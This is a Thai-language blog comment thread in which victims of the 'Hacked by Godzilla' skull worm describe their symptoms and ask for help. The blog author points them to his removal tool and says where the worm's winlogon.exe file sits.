ขอบคุณอย่างสูงคุณเป็นคนดีมาก ขอขอบคุณ

อยากรบกวนถามเกี่ยวกับเรื่องการHack หน่อยค่ะ

เพราะเวลาเปิดเวปไซด์ต่าง ๆ จะเห็นข้อความ

ขึ้นที่ข้างบนว่า Hacked by Godzilla ต้องทำยังงัยค่ะ

ทั้งที่มีโปรแกรมป้องกันไวรัสน่ะของBitdefenderรบกวน

ช่วยแนะนำหน่อยค่ะ ค่อนข้างงง

Thanks ตั้มคุง

ตอบคุณ   คนงงคอม ครับ

 ผมได้อธิบายเรื่องนี้ไว้แล้วที่

http://gotoknow.org/blog/president/86031

พร้อมทั้งมีตัวแก้ให้ อธิบายให้ละเอียดแล้ว  ศึกษาได้เลยครับผม

คือผมโดน3เครื่องเลยครับแต่1ในนั้นลงwindowใหม่ไม่ได้ผมก็เลยโทรไปถามอาจารย์มาครับ

อาจารย์ผมก็เลยบอกว่าไอ้ไวรัสตัวเนี่ยมันถึงขั้นทำให้HDDพังได้เลยครับอาจาย์ก็เลยบอกว่าลอง zero fill HDDดูก็ไม่ได้ ผมลองลงwindowใหม่หลายรอบแล้ว ประมาณ7-8แผ่นได้ลงไม่ได้เลย ทามไงดี

ผมติดตามกระทู้นี้มานานพอดู เห็นมีคนยอมรับว่าเป็นคนปล่อยไวรัสตัวนี้ โดยส่วนตัวผมไม่เชื่อ!! 

 เพราะที่โพสลงมาเหมือนคนโรคจิตสมยอมมากกว่าคนทำ

 ช่องโหว่ก้อมากพอดู คนที่ไม่ตั้งใจลบข้อมูลไม่มีทางตัั้งอกตั้งใจพัฒนาเวอร์ชั่นใหม่ๆออกมาหรอกคับ

  เพราะงั้นคนที่อ่านเจอก้อไม่ต้องไปว่าอะไรเค้าหรอกนะคับเสียเวลา

 แต่ที่พอเชื่อได้เจ้าเวิมตัวนี้น่าจะเริ่มแพร่จากบ้านเราเพราะเท่าที่ผมติดตามเว็บ ตปท. เองมีแต่คนโดน

 ไม่มีคนแก ้แต่ไม่มากเหมือนบ้านเรา ส่วนคนสร้างคงอายุไม่มากไม่น้อยเท่าที่ดูผลงานเชื่อว่าเป็นมือใหม่ที่มีความรุเรื่องซอฟแวร์และระบบปฏิบัติการพอสมควร

 ที่ผมระบุว่าเป็นมือใหม่เพราะดุจากระยะเวลาที่ต่างกันมากของเครื่องที่โดนแล้วขึ้นหัวกะโหลก(ผมมีเครื่องลูกค้า2เครื่องโดนเกือบพร้อมกันระยะเวลาเปิดใช้งานพอๆกัน แต่เครื่องแรกขึ้นหัวกะโหลกภายใน5วัน อีกเครื่องเกือบ2เดือน)

 ลูกค้้าผมดันเพิ่งโทรมากบอกตอนเครื่องที่2ขึ้นหัวกะโหลก - -" 

 แสดงว่ามีปัจจัยบางอย่างทำให้คำสั่งที่เค้าเขียนไว้ทำงานได้ไม่ตรงกัน แต่ถ้าเป็นพวกโปร(แมร่ง)เขียน

 จะสามารถลบข้อมูลทั้งหมดได้ภายใน3นาที ทันทีที่เครื่องได้รับเวิมตัวนี้ 

 (บางคนอาจอยากรู้ว่าเวิมตัวนี้คือไรขอโทดชื่อมันเปงฟามลับทางราชการ เพราะที่โดนน่ะมันเครื่องทดลองของ(ไอ่)คนที่มันเขียน ผมแค่ยืนดูข้างๆ แล้วก้อไม่ได้มีการปล่อยออกมาเพราะมันเขียนเพื่อจุดประสงค์บางอย่างของมานน..)

ผมก้อไม่เก่งขนาดสร้างตัวแสบๆพวกนี้ได้แต่ก้อมีความรู้พอสมควรเพราะม(ีไอ่)คนที่สร้างตัวเจ็บพวกนี้เปงคนรุจัก กัน เลยอยากเตือนคนทำ Hack by.. ว่า

 อย่าพลาดไปแหย่ต่อมตุ๊ดตู่คนพวกนี้เข้า (ถ้าคนทำมันได้เข้ามาอ่านนะ - -")ล่ะคับ โลก"ไซเบอร" น่ะมันน่ากลัวนา เส้นทางที่คุณปล่อยไวเวิมตัวนี้ออกมา

มันหาได้ภายใน5ชม. นอกเสียจากว่าคุณไม่เชื่อว่า

  "Hacker" ไม่มีจิง!!!

 สำหรับเจ้าทุกข์ที่โดนก้อไม่ต้องสงสัยเลยว่าทำไมพวกเก่ง(ฟาดดด) พวกนี้ไม่มาเขียนแก้ ถ้าถามมัน

 มันจะตอบให้หน้าหงายว่า "ธุระไม่ใช่!!" (- -")

 พวกเรามานคนธรรมดาเจอไรก้อช่วยๆกานแก้ไป ใครเคยดูหนังน๊ะ ชีวิตพวกมานนเหมือนในหนังแหละทั้งห้องทั้งชีวิตมันมีแต่ คอมและซอฟแวร์ อ้อ มีเลย์รสโนริสาหร่ายด้วย...

อ้อ ถึงเจ้าของกระทู้ไอ้ที่คุณเขียนเนี่ยไปดังที่เว็บของในเมืองนอกล่ะ ดีจายด้วย ^ ^" 

ตอบคุณ ฮวง ครับ

     ผมเห็นคุณ ฮวง มาร่วมแสดงความคิดเห็น เกี่ยวกับคนทำเวิร์ม  เยอะดีครับ  และก็ขอบคุณสำหรับ ข่าวคราว ว่า Blog ผม ออกนอก แล้ว ^ _ ^   ถ้าตัวที่ผมทำมันแก้ได้ ก็ถือว่าเป็นประโยชน์ แต่ถ้าแก้ไม่ได้ ผมก็ขออภัย จริงๆครับ  

ผมไม่ได้เก่งมากมายอะไร  แต่พอรู้บ้างเรื่องคำสั่ง dos  command line  ดังนั้น ที่ถามว่าผมเขียนด้วยภาษาอะไร   ตอบเลยว่า  command line ครับ 

ตอนแรกเขียนเป็นภาษาซี  (เพราะทำภาษาอื่นไม่เป็น แฮะๆ) แต่รู้ไม่หมด ติดขัดเรื่อง Memory เลย หาทางกลับมาที่ command line เหมือนเดิมดีกว่า  555+    โง่จริงๆ    

Blog ดังๆ  แต่คนทำไม่ค่อยประสีประสา อะไร  ขออภัย จริงๆ ครับ ผมคนเฮฮา  ไม่ได้ซีเรียสอะไรมาก  ไม่ได้เก่ง ไม่ได้ มีความรู้มากมาย แต่ถ้ามีอะไรพอช่วยๆกันได้บ้าง  ก็จะพยายามหาทางให้ครับ

ไวรัสเข้าไปลบข้อมูลใน Lan ด้วย สามารถดึงกลับมาได้มั้ยค่ะ ขอ Serial Number ไปทางเมลล์แล้ว ช่วยส่งให้ด้วยน่ะค่ะ อยากได้ข้อมูลกลับมามากๆ ค่ะ

ไวรัสที่ตอนนี้บนไตเติ้ล ว่า

 Hacked by MICROSOF-8B974D

เป็นชนิดเดียวกับไวรัสหัวกะโหลกหรือเปล่า

ซึ่งมันทำให้ไดร์ฟ C   พื้นที่เต็มหมดจะทำงานอะไรไม่ได้เลย

จะแก้ไขอย่างไรดี ขอคำแนะนำหน่วยค่ะ

เออ พี่ครับผมอยากได้โปรแกรมใหม่อ่ะ อันเก่ามันไม่ค่อยจะดีช้าด้วยอ่ะ ถ้าใครมีช่วยส่งติดต่อมาทีนะครับ ที่ อีเมล [email protected] ขอบคุณครับ

ไวรัส ถ้าอยู่ไดรฟ์ C  จะอยู่ที่ c:\winlogon.exe  เท่านั้นนะครับ

ไฟล์ระบบ จริงๆ ที่ไม่ใช่ไวรัสก็มีชื่อ winlogon.exe ถ้าคุณเผลอไปลบเข้า อาจเข้า windows ไม่ได้เลยครับ แต่ไฟล์ระบบนี้จะไม่อยู่ที่ c:\winlogon.exe  แต่จะอยู่ที่  c:\windows\winlogon.exe  หรือใน system32 ก็เป็นได้ครับ

ของผมไม่ขึ้น hack by.... แต่มันขึ้นมาว่า f u c k you!!!!!!!!!!!!!!!  (มันขึ้นอย่างนี้จริงๆขออภัยที่ไม่สุภาพ) เป็นไวรัสประเภทเดียวกันรึเปล่าคับ

Fuck YOU  น่าจะเป็นแบบเดี่ยวกันครับ ลองไปที่นี่ครับ

http://gotoknow.org/blog/president/86031

หากต้องการดูเครื่องมือทั้งหมดดูที่นี่ครับ

http://gotoknow.org/blog/president

ขอโทษนะครับผม  คือตอนนี้ผมมีปัญหาคือ Handdy Drive ของผมอาจมีปัญหาเจอไวรัส  อาการคือ  มันจะมี Floder ที่เคยมีในHanddy Drive ของผม 2 Floder ในHanddy Drive ของผม  ผมลอง scan ผ่าน NOD32 แต่มันก็ไม่พบ  ผมต้องทำอย่างไรครับผม

ดาวน์โหลดแล้วแต่ใช้ไม่ได้ คือมัน extract ได้ไม่หมด ไม่รู้ว่าจะทำไงดี

หาที่โหลดไม่เจอ

เข้า safe mode ไม่ได้ มันค้างตลอดเลยค่ะ จะ ทำยังงัยดีค่ะ

ขึ้น หัวกะโหลก ยังคับ

ถ้าขึ้นหัวกะโหลกแล้ว จบ

แต่ถ้ายังไม่ขึ้นที  ลองไปเช็กโปรเซส ไปปิดโปรเซส พวก Utility เสริม ดูคับ

พี่คับ คือว่าผม โหลดโปรแกรม Anti_hacked By 1 BYTE

ไปใช้เเล้วก็พอเปิดเครื่องขึ้นมาแล้วมันก็ทำงานตลอดเวลา

มันให้ผมรีสตาร์ทเครื่อง ทุกครังเลยครัย หลังจากนับเวลาถอยหลัง 10 วิ ตอนนี้ก็เป็นอยู่ครับ

พอรีแล้วมันก็ให้รีอีก

รีแบบคอมอยู่ดีดี ก็ดับไปเลยเเล้วก็เปิดใหม่ก็รีอีก

ทำยังไงดีครับพี่

โปรแกรม

Anti_hacked By 1 BYTE

ผมไม่ได้เขียนคับ

ศูนย์คอมพิวเตอร์ เขียนโปรแกรมนี้ขึ้นมาคับ

ลองปรึกษาคนเขียนดูครับ

ผมคาดว่าไฟล์ระบบ คงหายไปแน่ๆเลย  เครื่องเลย ต้อง Reset ตัวเอง  ทางเดียวผมว่า น่าจะซ่อม Windows ครับ

แต่ยังไงก็ลองติดต่อที่นี่ดูครับ

http://netserv.cc.psu.ac.th/home2/index.php?option=com_content&task=view&id=227&Itemid=249

พี่คบไอ่วิธีของพี่อะ

ทำยังไงอะคับ

บอกทีดิคับ

ผมจะทมั่งอะคับ

ก็ ไอ่ virus ใรคอมผมอะ มันส่งไปทาง msn อะส่งไห้เพื่อนผมอะ

แล้วมันก็มาด่าผมผมเซ๊งเลยอะ

อยากจะทำวิธีเดียวกับพี่อะแต่ทำไม่เป็นสอนทีคับนี้เมลผม

[email protected]

ขอร้งนะคับช่วยที

พูดตามตรงนะน่ากลัวจนขนลุกเพราะโดนแบบนี้มาตั้ง2ครั้งงานที่อุสาห์ทำก็หายเกลี้ยง

น่ากลัวจริงๆ

โดนไวรัสที่ไปลบซีโร ฟัคเตอร์ของ hd แล้วก็ไปทำอะไรกะมันไม่ได้เลยบูตไม่ได้เลยสงสันเมนบอดจะโดนด้วย

อาการ

จะขึ้นบูลสกีน แล้วให้เราต้องรีเซต เปิดอีกทีก็ใช้ไม่ได้เลยครับ

ช่วยแก้หน่อยครับ หมดปัญญาแล้ว

รบกวนหน่อยนะค่ะ

เครื่องมันขึ้นError signature

szAppName : winlogon.exe szAppVer : 0.0.0.0 szModName : ntdll.dll

szModVer : 5.1.2600.3520 offset : 000109da

คืออะไรเหรอค่ะ

โปรดส่งคำตอบมาที่

[email protected] ด้วยค่ะ

กราบขอบพระคุณเป็นอย่างสูงค่ะ